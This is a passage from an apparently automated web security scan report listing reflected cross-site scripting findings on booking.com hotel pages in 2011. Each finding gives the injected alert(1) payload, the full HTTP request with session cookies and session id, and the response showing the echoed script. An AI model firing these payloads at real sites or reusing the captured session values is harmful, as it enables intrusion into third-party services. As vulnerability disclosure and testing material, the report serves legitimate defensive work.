nhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:44 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTIralIgQDPa%2BU2m2TeiMmkqTwxqv8P9CSbaojOGwPyNNdTCsA2pp1CcZ4153Rkg0qsCH36ioWVwdYtCjINHYRQt5ogbRNxPN4%2Fhx8v8X2akzUe5hAd7etTtpEabE%2BOdLWGqw%2BeJDN%2Bl6eWiaXEkxoedKYKeOXlbvqavSUnO5t8yevR4bo5Wkj8Er53ucTZERs%2B8z52E30AqWphJuy3NAPVl0IohKm5JiPkR1%2Br8uKmVIqYJZ0tNXtXcoXES%2BWOcXaGwkkaXUBRPtj9xwyredU4%2BcXRi%2Bky3NQxeufDo%2F5CX76LXBwWievIqoeZEQrxXbW7u61LD4alt%2FHDjRsWRaLh%2BdowEJMAWvf6sd%2BU%2FT5R8yMFpoW7py1xmbla8lecSx6VaZFX337UfYQDkTXn%2FvsJTwFxUfIv87QWMZyhYwFeapP%2BhbGfkMV2E%2BpM22QgZAGqlsdK3Mv%2BKgjvGMzXafGcp6auwgAtkNlIa1jqYcLskbGpcUPY%2FgUUl7zZckZ8dN4fKNXKu7oOdAI24WAW0rBpeNAdSKvO1yOhk2KDk%2BTQf9Qew4fJDkP8%2F3WibH3152y9TVcjHPzwkYgMhYxEeekigFVTxmEWsj733jZMbynhZsgtylWAG31HfNBP%2FyNi0efglr3PL%2FPjWdjIfnVGP5I3RQDB%2BeUDrOE4V840viVuEx%2Fjy0LaUQHyeyEtQK0%2FubBm%2FpoX2QeySOEi1trx6co4HH1%2BMFfIgm2mEK8FNkMLdTL22jwcevVv3uCAHqpErSxzS85yh1gQoeesgtdMgnIvbJuEovBo8G4nPwDuZSBn7N59ghoPIp2irrie%2FBWiq%2FhZlzDx7wB4LBZXmo4iROpAO6n7ZfgJZHMhCUNOv%2FM7Y6qV8V3zMchCwALYMKcIFUvKhCKcOY5HgAdCvGu1mIXacXG6P%2F0arsYx0cDLSGzgFByjlcHlXyZWuPN3x780%2Bb7Iu4OMwqm4UfT34n6UFGkGFIraa5tDr4evTnOEbwH0eZS0J13juQwv0jlllU7KU9D3xwbGX7Sh6ToG2l0fVYF17yYigVmx4Gx0iUWgSu2XTJE6Cs54czFyQFe7qPhQO527Sw6U25ygU9hw1L3ZBVvsyRJAcYEDa57Uz0n7pO8tKpH4xQG0YqR6t1eCPqLQ2T2rW2Zd7PA4PDZDQFjrSVtLmOuUDRvefhzgGC9WeZ8eXU%2Bgpu37CVo5ehcrT90p8sfmDzhqaaIQx7KWvZMLN6uz8oZ8GDy2l7BRoVf59q8GYmlm1VOxFkxxLzhO2LpQQ6O%2B%2BwHodeWNk3YqgqJfC2CZXUg22U3ZXb1YIABwgIng%2FIwOLFp6p4504pihm7pZ%2BB7iervYO7NsrXHSlksImDv2r5RnNZydgRT6uvySwOY6W4Q1xCU9byndX1dhAGfLzjw9omvFAAVrR5HJ3pAEhzpTfd3PHQ8UyFGeQtWB%2Bri6XUUr%2Bgu73g4OtcD9oslYkbg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:19:44 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55934
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotel/us/copley-square.html6c246"><script>alert(1)</script>ca9d29b05b0" />
...[SNIP]...
4.199. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edee7'%3balert(1)//ed927a03f37 was submitted in the REST URL parameter 3. This input was echoed as edee7';alert(1)//ed927a03f37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/copley-square.en-us.htmledee7'%3balert(1)//ed927a03f37?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:55 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YVuoakmCuggKVBk4dVUHfDVnewdIvAmgoL0tSDTgFt9zgdISpAL9zaHjp6X9Iy1Q%2BUur%2B%2FRf37bFsaJsXw908W4diQTtTz13fHFhiEf%2FmLPYV%2FFGUzga5TwTyRd7Zqi5YdeROYvwI09F7R%2BHenmuEuJcMR%2FnFxXN%2FRAMEqLwczMSu34en%2FtI3AeEAtwK%2BBHe7jzOabclaj5UiseUxH3%2B6POt6jcGBLpsrYHQBSrxdHkAIY9CjOLB%2FbW6pDR0cPFb1Za3Vt022IKEwCF6AZ3n4zWvOKJs8BVmyo1ck5vPnPE4j9INed765odKzPMz5u1oFAl%2FpGd7isYZrIQNeSQ2u6CQhaSh%2FiKhyqvUBcnbv77xDHmzZPM6uA%2FULLH82QUtuW1MA8%2Fe8Lxz%2BzC8Jpn9eWSNdd3YOQOExP4JHg0ZTwPq5ygvygKvnyNngGlJmX8AvpISLdaJLPBuHKAFM4mLCx164EFuXFeLXLFI4Y8%2BFz7sDavEPeX2A6G0LKkMybTIU6VqU4Eb6QV5efi1fQI1pV4w8Ud3z%2FdyDcTZDOfCzXjnPvD%2BPekw0LLvFmUN88qQloqwt6aSzpTNcLwH8q93J9En2%2FAEWmlhiancoHjmEr9gFyYfgt7%2BKjTYAfeKfU4A%2BcXIq%2BxeayxrIPKurH6O8EIwdXr0YvAMdjjDEjRoj4RJ7Du%2FFwI0p%2BWoDDrz4mn2JbCfObAyCb%2BVVYak5pJqw2Hp68M6fEOKCVGT9E5Cz6DeT2rVyT5EfIogClFHau8pHoDDRK%2F%2FrLF6zfhuDNvHiI79UN%2F44ZPwOnf9cEAHHdvHV%2Fw0Ln60jq9qAgvHMs5y6xII9yg%2F2BJbGt%2Fhk8DoeNjse3WJBOaQZj5RKKkUKHuoVzkt4nlNSmfx1Ou6cBVu%2F5nFtOzq4tP00BN7RqJroHiWfEKOiGs6%2FtaY0Zzb4s%2FCkDEAgE7qKzrKgoSGbIvFaVpAMEIdhGykdL3%2FkDxY72ImGZMBah6rrVULGs1xMu4r8g4xIO8pj8jZEXSV9X7oNjp7suwCiXC9OJ8r%2F6FmpBUv1Y8UZed532VAHmJpftG7%2BOhdWga1yZ4ijRqTR5aElZcBSypuG9zAa8oMQbRjXwOmUeeTBdTnhG60Z9lonsMaUndyuEzdcPBIcg7L3CRJYHEGnimHMBo4tQ547yBF7ZFVQuRc%2BVX%2FMVXQHctSxtG9%2FJUsjbzh9xN5weHI6gPa6T13sqq0aw0HuZXq9qoYyMbO3Fu2zI7zO0KiI6ZTwxV7zMxrLAJF%2FBvbMpdE5GZX0%2FyGMJ%2Bda1vpZQcr%2B7quzwRCI7P2H8aizFq58Tyt1RVcBpICgb%2BEjofvbSJXtEpHU8HSXhsY0WVTABZRKoJEy4KRouDEtQZXf6UPOt7WHg7tne1cP%2Bb8P8o7lfL0%2Fx2IEoRcbbqkODR4IoI90AaA1L6rC18IITzW0a4OZIwWb6WZM0xEHEtjtRqTeRrfKG2KQw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:19:55 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55859
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ent_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/copley-square.en.htmledee7';alert(1)//ed927a03f37';
booking.env.b_canonical_url_delimiter = '?';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.env.close_button = "C
...[SNIP]...
4.200. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74577</script><script>alert(1)</script>db952ffff6a was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X174577</script><script>alert(1)</script>db952ffff6a HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:18 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbngn4lN%2BjiaMM3%2FFSz5aK01fZviYAwYW1RyxkX%2BBXQhpWnHNnQ%2BTxQuoiSxBYaF6mm%2FY2WSy0TkgYM%2BaKM7XjRzQsF7X8fJX9B96maybTSPEvrynbwEUbiqnzI%2FesVse7IJaTfI5Vn%2BI3ZvyxVvPK8XUNRomoGf5CH0geme1mD2JyZyMbEoHKs4%2F1EA8q4JLLwQXIlBra1pMYeTZ%2F5LI2kgBVEbxrKIrk5Dr7gfTEwnFs0XibpKwY5ohRh0ODSnta71Ro1K3heWdpa2kdUegQgtJfeyTUgjQxyB81L9DSk1BBkHKVzVnHmG%2B0cuvr95g17s6X73En5yB3lIjNpO6mOynbT5LZoCDYydE2VMcs0Eu0yKoqvq6d6rW8oibWnh2Xe6t8LFZok7KESzbiXrwdUl6JDqnM4pADTKIiHHvQszS9tJ%2Bt735RH3mV12YAARFIfO06w8kN0%2Bm0Mg8k0sRKulZzIxYXmU4M1QTJLF5WUo%2FaGitJdm%2FaJ%2BaQ1ahwfBO%2BYmeMEHQDFqyCJSrv%2FNE8jRwuRmrStokdeuUkLHeBgOY%2ByTwOF%2BTtMULnT3ol%2FlCgatG2qA61R1uNe9VYhE5%2BShiqmCPIMEC6MKl959MPDvcikcj38q%2Bv8%2BkI5KpshJj0ZEFNhqPEkCmi%2B5uJvBUHNcOVjwkmjsHZZYWLjN04QovQwSw6nNElx6fZdxPsP%2BQduIL1CZ0kiBgLXwB1pMgCze37KXiiR5dO1zkFKJ3cYVD1VozjzGMAarn4PkhZEbymLfEmYTsC3pQnRMDUz%2FvQGFrKL%2F8ZeDty0tpYIW%2FuZEBzIVpGDnc9Psi1EX%2BdlhGCwricrrrWCLRigOisjsQg%2BLpQPkxP6YaaLCrXziB1FbBd4rNJazeVN%2BcZwtLpUmD0HVF7%2FlzVl8qzFcjdZsS0ot6PpfRaXLYKBbR9lBI5XGzZ4cIirEmubiMlUVSEiGapDhfSP%2FqQ3Ka23Sj8jhjS%2BBb1ZKSYKUzhhxaONtB5kkd13%2Fl1Rtp84dBmkTabsIMPgCT1wd2cEFQBljPHwnQt%2FrKoNXpsuCAr3kYXYBbN2UzXLUkI5EmPH%2FW%2B2cUVJb3zLLH0I9G%2B9%2F4sY%2BIT2f%2BYSA0YkMXg7EJ031%2BguShzeXnxeGgd35JCC0eHJhEmrGgl%2B9OO%2Fi5qL8UvodoCGGnqaGr7WISAHp4CG%2BvpmGtB1NATvLQ1jL57TPz%2Bg5jzj0QJ8yP47s2VwqLvdd8nDkPzQJIR9S%2F%2FgfKrYPlJoq8GSWZY2OL8NOIoRAxlQvI4i5UrGXPk98252QCOJVAx%2FgrwLY8FtDJcOad9gaiRlKcwZd1T2YfvK4mbPoYQXDjDsfLIXke2KzkuYOhBh88yRjK%2FoKAM26x%2Bd%2F2LUJoeC7tS6GtCHtJWnhuGNsJkkU1jYzLXpXO6ytIWRyzPe6%2FnziWbk5qWohYr0%2FT2g%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:18:19 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 244918
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
p://www.booking.com/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X174577</script><script>alert(1)</script>db952ffff6a',
b_this_url : '/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;dva=0',

"setvar_affiliate_is_bookings2
...[SNIP]...
4.201. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of the aid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87a75"><script>alert(1)</script>aac1708aa5d was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X187a75"><script>alert(1)</script>aac1708aa5d HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:38 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbrwVl5xDk4n3xHvjoyWEf1%2BWIgLGQJ%2Fr1v%2B3I75L5T0i%2B97JWuV5Nnceo8TqjdepyTcSSg4MSst%2Fu4alaf5Syh0QOEwJ%2B6XffhiF5Nn9HUl4UlHnbAnhwujcnYc23V9htXCDLw64w%2BL6jvllQGrMoJW7DoKTAIsjX3jG2T8fTRXnhwNQv11xn%2FOoOBH6xVdCyB1iQrD8GmnMyMRkZhTgcW61wBhtjZQEX%2FyejMvpz3NzaUySvMw5LIP%2FypeQs6pE0HcDEoBa5SCMF%2B46NawLf0DcWUaClAONsA8%2ForchHjMLUWhSuazcsh13YF%2Bz9fryS97m%2FHS9jwnBlw4jbJY%2FNXm477poJeBHQTQjkXwyAeXyVUdt0os0d2KNDJoblZq6%2BtWbWyMTxCjkH6bMACdBx2TMNM%2B%2BgVYTP9Uoegf7Dnyi1CmL1%2BlPZA9Hd40RnnmO%2BX8b60LKttX3QWvxDNrffSkKJuqfG5VvuFDMTCyshVABX%2B%2FudaV4JCnWb8x5dimR5EfsZhKwofvX6l2u6q6k4KN8JYe%2FWOEr7wedRfEPQsPI6FWyeduK5c%2Bhv0bhY%2FpxJKfcIg9ICFbxUhMBaAucsI2y4JEI7lIWfQJsv2Atlm2g7aWlUTQU2ieP0OyGcsZXpNx330YvN6ixXsATicWIxP0skGePfh5hfAGgOFeOBKG70MjBCy9gu8rYneWqqEzzr9yqqlZw0exU9awqDx4q%2BEmj7iSbKksfT4g5%2Fgx7C96tTT1%2BHAH%2B7ucvl1o9MRMUQAjJYmGMZArPHRVTThedUE2f9%2Bd0ORL2zmOQuvqYV8zQ6zAqlM9V%2F29b%2Fx9DacQFZ5wO9najDd5IjWuTT3R61BTIgenmypSb5pZrP6C36qcMtroeC6umkf2RttEIQEM%2Ftea3hS6L2zyVI%2FKkkB7zsxjJD5qqRH9ypiQNnvTxw1%2FQE%2F6laeDvbddHLVanQUq6f%2B6Mg%2BV9c9dlOyKlmXptnRoy87cCmClDx9il4ifUzi4NObwfTBRWC9RifIvkFNyeDFsw1wLgvcTb%2FwGvy1FuKo7MyX5b0H%2FWXbI1wXgepKLFSi6zuqqGg1rgtidYjyNY6db2%2Bc5JoozB2JMZNn9i1B2sHd4IRpfD5UaUERMSMu%2BYv3jURjG1%2FsIeTPb71vfe7In3%2FqssjrbBMPGW2gziGMSR8avDkI%2FAWZeNRpCVibuRMDlIYdMUOr13uQLu2TQPZEOpByoq7Wl3BJoDvsh20XRy1Si8KHgVIS92GUC1i86PzSKLvr4ONZCm7nkqFB7kO8EQv8KyjI0ZygDjExcV2RzwahpdfY20H1qgOHZlGSsKlXonMHjmaQbUm%2Fz6BQakWrHGUWih4GY7meJVBKmjJapx%2BBVT99EV5AyeFfg6hPHaHHng4jkOk2eQnKYiNNCouMH7b3CaNdKPV3TrOExfwYjI7cipe%2FPl4w%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:16:39 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 244901
Content-Type: text/html; charset=UTF-8


